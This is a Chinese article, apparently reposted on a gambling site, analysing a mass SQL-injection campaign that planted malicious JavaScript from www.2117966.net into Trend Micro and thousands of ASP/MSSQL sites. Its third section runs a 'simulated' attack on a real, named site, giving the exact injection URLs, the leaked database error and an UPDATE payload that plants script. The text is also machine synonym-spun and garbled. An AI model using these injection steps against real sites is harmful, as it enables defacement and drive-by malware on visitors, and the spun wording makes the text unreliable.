关于趋势科技等网站被进犯的剖析脚本之家csdn - AG环亚娱乐

关于趋势科技等网站被进犯的剖析脚本之家csdn

2018-10-07 09:34:31 | 作者: 忆之 | 标签: 页面,网站,趋势 | 浏览: 1528

一. 首先在网上找到了这次进犯的新闻报道 https://www.nsfocus.net/news/6697 https://hi.baidu.com/secway/blog/item/e80d8efa4bf73ddab48f31a3.html 经过GOOGLE查找到了相关被黑的页面 https://www.google.cn/search?hl=zh-CN&q=site:trendmicro.com www.2117966.net f**kjp.js&btnG=Google 鎼滅储&meta=&aq=f 趋势科技的页面被刺进过https://www.2117966.net/f**kjp.js相关的JS挂马。
二. 直接查找这个JS相关的信息 https://www.google.cn/search?complete=1&hl=zh-CN&newwindow=1&q=www.2117966.net f**kjp.js&meta=&aq=f 发现了12,500项符合的成果,这些回来的成果信息都是当时页面被刺进了JS挂马。 经过剖析发现被黑的页面都有如下特征: 1.被修正页面的网站都是ASP MSSQL的架构。 2.被修正的页面都存在SQL注入缝隙。
三. 取了其间一个被挂马页面做了SQL注入挂马的模仿进犯: 1. https://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162 这个链接存在显着的SQL注入,对person参数注入句子having 1=1,将暴出当时页面注入点的表名为coordinator,字段名ShCoordinatorSurame。 https://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162 having 1=1 —————————
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘coordinator.ShCoordinatorSurame’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp, line 20
—————————- 2. 修正暴出的当时页面的表名,字段名内容为刺进JS的代码来完成挂马 https://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162;update coordinator set ShCoordinatorSurame=’’ where 1=1–– 修正coordinator 表 ShCoordinatorSurame 字段内容为,一起设一个1=1为真的逻辑条件就可以修正当时页面查询数据的内容. 就可以完成在有SQL注入点的页面直接挂马。
四.总结. 这次大规模进犯的流程应该是自动化的: 1.经过先进的扫描技能批量收集到几万网站的SQL注入缝隙。 2.针对缝隙进犯,进行自动化的SQL注入挂马。 如今尽管SQL注入缝隙现已很老了,可是这次黑客在一天内一起对数万网站进犯挂马的技能却是很惊人的,连趋势这样的安全公司也未能幸免。
版权声明
本文来源于网络,版权归原作者所有,其内容与观点不代表AG环亚娱乐立场。转载文章仅为传播更有价值的信息,如采编人员采编有误或者版权原因,请与我们联系,我们核实后立即修改或删除。

猜您喜欢的文章